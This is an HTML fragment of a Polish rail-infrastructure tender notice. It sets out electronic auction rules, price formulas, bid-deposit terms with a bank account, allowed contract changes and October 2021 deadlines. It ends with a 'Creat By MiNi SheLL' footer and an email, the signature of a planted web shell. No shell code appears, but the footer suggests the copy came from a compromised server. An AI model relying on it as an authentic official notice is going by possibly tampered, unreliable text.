nie polega, o którym mowa w pkt 9.4. IDW,<br/>- jest umocowana do jego reprezentowania lub dane umożliwiające dostęp do tych dokumentów za pomocą bezpłatnych i ogólnodostępnych baz danych.<br/>W przypadku wskazania przez Wykonawcę dostępności ww. dokumentów, pod określonymi adresami internetowymi Zamawiający będzie żądać od Wykonawcy, jeżeli dokumenty będą w jężyku innym niż polski, przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://platformazakupowa.plk-sa.pl</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> 1. Zamawiający zamierza dokonać wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej. Aukcja zostanie przeprowadzona na Platformie Zakupowej Zamawiającego dostępnej pod adresem: https://platformazakupowa.plk-sa.pl<br/>2. Po dokonaniu wstępnego badania i oceny złożonych ofert, w celu wyboru najkorzystniejszej oferty, przeprowadzona zostanie aukcja elektroniczna jeżeli w Postępowaniu zakupowym złożone zostaną co najmniej dwie oferty niepodlegające odrzuceniu.<br/>3. Do udziału w aukcji elektronicznej Zamawiający zaprosi wszystkich Wykonawców, którzy złożyli oferty niepodlegające odrzuceniu z zastrzeżeniem zapisów pkt 21.2 IDW.<br/>4. Udział w aukcji elektronicznej w imieniu Wykonawcy może brać osoba wskazana w Formularzu Ofertowym na etapie składania ofert. <br/>5. W przypadku zmiany osoby uprawnionej do udziału w aukcji elektronicznej, Wykonawca winien minimum 24 godziny przed rozpoczęciem aukcji przekazać Zamawiającemu stosowne pełnomocnictwo, z którego wynikać będzie zmiana osoby umocowanej do udziału w aukcji. <br/>6. Osoba wskazana do udziału w aukcji elektronicznej musi posiadać ważny kwalifikowany podpis elektroniczny spełniający wymogi powszechnie obowiązujących przepisów prawa oraz posiadać aktywne konto użytkownika na Platformie Zakupowej przypisane w systemie do Wykonawcy/Lidera konsorcjum. Szczegółowy opis sposobu rejestracji konta zawarty jest w Podręczniku dla Wykonawców.<br/>7. Mając na uwadze czas potrzebny na aktywację konta (do 3 dni roboczych) Zamawiający zaleca, aby Formularz rejestracyjny na Platformie Zakupowej został uzupełniony i wysłany przez Wykonawcę z odpowiednim wyprzedzeniem. <br/>8.Rejestracja i korzystanie z Platformy są nieodpłatne.<br/>9. Na Platformie Zakupowej w zakładce Regulacje i procedury procesu zakupowego dostępny jest Regulamin prowadzenia aukcji elektronicznych, Podręcznik dla Wykonawców oraz film instruktażowy ilustrujący proces składania postąpień w trakcie aukcji. Wykonawca zobowiązany jest stosować się do zapisów wskazanych regulacji. <br/>10. W toku aukcji elektronicznej Wykonawcy za pomocą formularza umieszczonego na Platformie Zakupowej, umożliwiającego wprowadzanie niezbędnych danych w trybie bezpośredniego połączenia z Platformą Zakupową, składają kolejne korzystniejsze postąpienia, podlegające automatycznej ocenie i klasyfikacji.<br/>1)	Aukcja odbywać się będzie według reguły zniżkowej dynamicznej, co oznacza, że każda następna oferta Wykonawcy zostanie przyjęta tylko wówczas, gdy będzie korzystniejsza od ostatniej prawidłowo złożonej oferty tego Wykonawcy.<br/>2)	Postąpienia składane w trakcie aukcji podpisywane są każdorazowo, pod rygorem nieważności, kwalifikowanym podpisem elektronicznym za pośrednictwem mechanizmu wbudowanego w Platformę Zakupową. <br/>11. Sposób oceny ofert w toku aukcji elektronicznej będzie obejmował przeliczanie postąpień na punktową ocenę oferty w kryterium licytowanym, z uwzględnieniem punktacji otrzymanej przed otwarciem aukcji w kryteriach niepodlegających licytacji (jeżeli występują) oraz wag poszczególnych kryteriów. Punktacja zostanie zaokrąglona matematycznie do 10 miejsca po przecinku.<br/>12. W toku aukcji elektronicznej kryterium licytowanym będzie cena. <br/>Zamawiający ustala minimalną wysokość postąpienia na: <br/>90 000,00 zł (słownie: dziewiędziesiąt tysięcy złotych 00/100)<br/>Zamawiający przypomina, że ceny podawane w trakcie aukcji są cenami brutto. <br/>13. W trakcie aukcji Wykonawcy na konsoli oferenta wyświetlają się następujące informacje:<br/>1)	wartość oraz punktacja swojej oferty;<br/>2)	pozycję Wykonawcy w klasyfikacji ofert (kolumna Ranking);<br/>3) punktację oferty najkorzystniejszej.<br/><br/>14. Czas trwania aukcji to 30 minut oraz ewentualne dogrywki.<br/>Aukcja zostanie zamknięta po 30 minutach od rozpoczęcia aukcji, o ile nie dojdzie do dogrywki. Dogrywka zostanie automatycznie uruchomiona, jeśli w ciągu ostatnich 5 minut podstawowego czasu trwania aukcji zostanie prawidłowo złożona oferta przez któregokolwiek z Wykonawców. <br/>W przypadku uruchomienia dogrywki aukcja zostanie przedłużona od momentu złożenia tej oferty o sekundy brakujące do pełnej minuty, w której złożona została oferta plus dogrywkę o czasie trwania 5 minut, o ile nie padnie kolejna przedłużająca aukcję oferta. Kolejne dogrywki będą uruchamiane jeżeli w ciągu 5 minut od uruchomienia poprzedniej złożone zostanie prawidłowe postąpienie przez któregokolwiek z Wykonawców.<br/>15.Po zakończeniu aukcji elektronicznej Zamawiający dokona wyliczenia cen jednostkowych netto oferty (jeżeli występują) w następujący sposób:<br/>1)	Wyliczony zostanie procentowy wskaźnik upustu cenowego od wartości oferty pierwotnej, uzyskany w wyniku aukcji, który zostanie zaokrąglony matematycznie do 10 miejsc po przecinku. Obliczenia zostaną wykonane według wzoru:<br/>U = 100 – (W aukcji x 100) / W oferty [%]<br/>2)	Następnie wyliczone zostaną indywidualnie poszczególne ceny ryczałtowe netto znajdujące się w Rozbiciu Ceny Ofertowej z oferty złożonej przez Wykonawcę w terminie składania ofert, poprzez obniżenie tych cen o wartości upustu wyliczoną przy zastosowaniu wartości wskaźnika upustu (U), przy czym ceny te zostaną zaokrąglone matematycznie do dwóch miejsc po przecinku. Obliczenia zostaną wykonane wg wzoru:<br/>C aukcji = C oferty – (C oferty x U)<br/>gdzie:<br/>U – wartość wskaźnika upustu cenowego od wartości oferty pierwotnie złożonej przez Wykonawcę w terminie składania ofert uzyskanego w wyniku aukcji elektronicznej<br/>W oferty – wartość oferty pierwotnie złożonej brutto w terminie składania ofert <br/>W aukcji – wartość oferty uzyskanej w toku aukcji elektronicznej brutto <br/>C aukcji – cena ryczałtowa netto poszczególnych pozycji Rozbicia Ceny Ofertowej przyjęta do umowy<br/>C oferty – cena ryczałtowa netto poszczególnych pozycji Rozbicia Ceny Ofertowej oferty złożonej przez Wykonawcę w terminie składania ofert <br/><br/>3)	Cena netto przyjęta do umowy zostanie wyliczona jako suma cen ryczałtowych netto znajdujących się w Rozbiciu Ceny Ofertowej wyliczonych w sposób określony w pkt 2) przedmiotu zamówienia. Dalsza część opisu Aukcji Elektronicznej znajduje się w Tom I - IDW Rozdział 22 - AUKCJA <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: <br/>10 000,00 PLN<br/>(słownie: dziesięć tysięcy złotych 00/100)<br/>2.	Wadium musi być wniesione w formie zgodnej z art. 97 ust. 7 Ustawy.<br/>3.	Wadium musi być wniesione przed upływem terminu składania ofert, wskazanym w pkt 17.1 IDW i utrzymane nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w pkt 11.11 ppkt 2 i 3 IDW oraz pkt 11.12 IDW.<br/>4.	Potwierdzeniem skutecznego wniesienia wadium będzie:<br/>a)	w przypadku wadium w formie pieniężnej - zaksięgowanie na rachunku bankowym Zamawiającego przed upływem terminu składania ofert, Zamawiający zaleca, aby Wykonawca dołączył do oferty dokument potwierdzający wniesienie wadium w formie pieniężnej,<br/>b)	w przypadku wadium w formie innej niż pieniężna - przekazanie oryginału dokumentu wadialnego (gwarancji lub poręczenia), wystawionego zgodnie z obowiązującymi przepisami prawa, w formie dokumentu elektronicznego opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia (wystawców dokumentu).<br/>5.	W przypadku wnoszenia przez Wykonawcę wadium w formie gwarancji, gwarancja ma być co najmniej gwarancją bezwarunkową, nieodwołalną i płatną na pierwsze żądanie Zamawiającego dokonane w formie pisemnej lub oświadczenia woli złożonego w postaci elektronicznej opatrzonego kwalifikowanym podpisem elektronicznym, do której zastosowanie będzie miało prawo polskie. <br/>6.	Gwarancje i poręczenia muszą zawierać (oprócz elementów właściwych dla każdej formy, określonych przepisami prawa):<br/>a)	nazwę i adres Zamawiającego,<br/>b)	oznaczenie (numer) oraz nazwa Postępowania,<br/>c)	termin ważności wadium – odpowiadający terminowi związania ofertą, zgodnie z pkt 16.1 IDW.<br/>7.	Zamawiający zaleca aby dokument wadialny (gwarancje lub poręczenia), został złożony wraz z ofertą, jako załącznik do Formularza złożenia oferty, o którym mowa w pkt 14.10 IDW.<br/>8.	W przypadku oferty wspólnej, Zamawiający dopuszcza podział kwoty wadium pomiędzy Wykonawców wspólnie ubiegających się o udzielenie Zamówienia i jego wniesienie w częściach, o ile suma tych części będzie równa kwocie wadium określonej w pkt 11.1 IDW. <br/>9.	Wadium wnoszone w pieniądzu należy przelać na następujący rachunek Zamawiającego:<br/>nr IV/O Bank PKO BP nr 42 1020 1026 0000 1802 0287 4378<br/>SWIFT: BPKOPLPW<br/>W tytule przelewu należy podać:<br/>„Wadium w postępowaniu przetargowym nr pos. 0443/IZ10GM/19101/05285/21/P”<br/>(oprocentowanie w/w rachunku wynosi 0,00%)<br/>10.	Wykonawca jest zobowiązany podać w treści przelewu bankowego numer referencyjny Postępowania. <br/>11.	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1)	upływu terminu związania ofertą;<br/>2)	zawarcia umowy w sprawie zamówienia publicznego;<br/>3)	unieważnienia Postępowania, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. Dalsza część opisu WADIUM Tom I - IDW Rozdział 11 - WADIUM <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Ofertę wspólną mogą złożyć Wykonawcy wspólnie ubiegający się o udzielenie niniejszego Zamówienia. <br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie Zamówienia muszą ustanowić i wskazać Pełnomocnika do reprezentowania ich w Postępowaniu o udzielenie niniejszego Zamówienia albo reprezentowania w Postępowaniu o udzielenie niniejszego Zamówienia i zawarcia umowy w sprawie zamówienia publicznego – zgodnie z postanowieniem art. 58 Ustawy.<br/>3.	W przypadku składania oferty wspólnej, warunki szczegółowe określone w punkcie 8.6 IDW uznaje się za spełnione, jeśli spełnią je łącznie wszyscy Wykonawcy składający ofertę wspólną. <br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie Zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa w pkt 10.5 IDW, Wykonawcy wspólnie ubiegający się o udzielenie Zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy .<br/>6.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem zgodnie z treścią pkt 14.14 IDW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy możliwa jest w przypadku zaistnienia jednej z następujących okoliczności w zakresie i na warunkach określonych poniżej:<br/>1.	Zmiany technologiczne spowodowane następującymi okolicznościami:<br/>1)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji niż wskazane w SWZ, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego przedmiotu Umowy, lub umożliwiających uzyskanie lepszej jakości przedmiotu Umowy;<br/>2)	pojawienie się nowszej technologii wykonania zaprojektowanych robót budowlanych stanowiących przedmiot Umowy, powodującej zmianę sposobu wykonywania Umowy, pozwalającej na skrócenie czasu realizacji przedmiotu Umowy lub zmniejszenie kosztów wykonywanych prac lub robót, jak również kosztów eksploatacji wykonanego przedmiotu Umowy, pod warunkiem osiągnięcia niemniejszych parametrów końcowych wykonanych robót, na umotywowany wniosek Wykonawcy po akceptacji Zamawiającego;<br/>3)	odmienne od przyjętych w PFU warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu Umowy przy dotychczasowych założeniach technologicznych lub czasowych;<br/>4)	konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych posiadających świadectwa dopuszczenia do eksploatacji typu , ze względu na zmiany obowiązującego Prawa;<br/>2.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 powyżej możliwa jest zmiana sposobu wykonania, terminu wykonania Umowy, Ceny, zmiana materiałów i technologii wykonania przedmiotu Umowy i konstrukcji obiektów budowlanych, jak również zmiany lokalizacji obiektów budowlanych i urządzeń w zakresie adekwatnym do przyczyny powodującej konieczność zmiany.<br/>3.	W przypadku dokonania określonych czynności lub ich zaniechania przez organy administracji państwowej, w tym organy administracji rządowej, samorządowej, jak również organy i podmioty, których działalność wymaga wydania jakiejkolwiek decyzji o charakterze administracyjnym w trakcie wykonywania przedmiotu niniejszej Umowy, w szczególności:<br/>1)	opóźnienie wydania przez ww. organ decyzji, zezwoleń, uzgodnień itp., do wydania których są zobowiązane lub Wykonawca ma obowiązek je pozyskać na mocy przepisów Prawa; <br/>2)	odmowa wydania przez ww. organy decyzji, zezwoleń, uzgodnień itp., z przyczyn niezawinionych przez Wykonawcę;<br/>3)	za odmowę, o której mowa w pkt 2) powyżej, Strony będą również uważały odmowę udostępnienia przez właściciela nieruchomości do celów realizacji inwestycji;<br/>4)	nałożenia przez organ dodatkowych czynności proceduralnych nie przewidzianych w zamówieniu;<br/>5)	wniesienie odwołania/skargi/sprzeciwu w trakcie uzyskiwania wszelkich decyzji, zgód, pozwoleń;<br/>4.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 3 powyżej możliwa jest zmiana terminów pośrednich, a także terminu ostatecznego o okres wynikający z opisanych okoliczności.<br/>5.	Pozostałe zmiany spowodowane następującymi okolicznościami:<br/>1)	siła wyższa, o której mowa w § 37, uniemożliwiająca wykonanie przedmiotu Umowy zgodnie z SWZ;<br/>2)	nieprzewidziane w Specyfikacji Istotnych Warunków Zamówienia warunki archeologiczne, techniczne, terenowe i wodne;<br/>3)	wystąpienie warunków eksploatacyjnych (np. wypadki kolejowe, katastrofy) skutkujących niemożnością wykonywania Umowy wpływającą na termin zakończenia Etapu lub całości robót;<br/>4)	wystąpienie konieczności wykonania robót dodatkowych lub zamiennych wstrzymujących (opóźniających) realizację robót zasadniczych a wynikających z nieprzewidzianych zdarzeń o charakterze technicznym lub eksploatacyjnym;<br/>5)	wystąpienia robót/usług zaniechanych – wyłączenie robót/usług zaniechanych z realizacji wraz ze zmniejszeniem kwoty umownej wynikającej z tego wyłączenia; - Kontynuacja zapisów Tom II - UW § 33 - Prawo do zmiany Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.plk-sa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com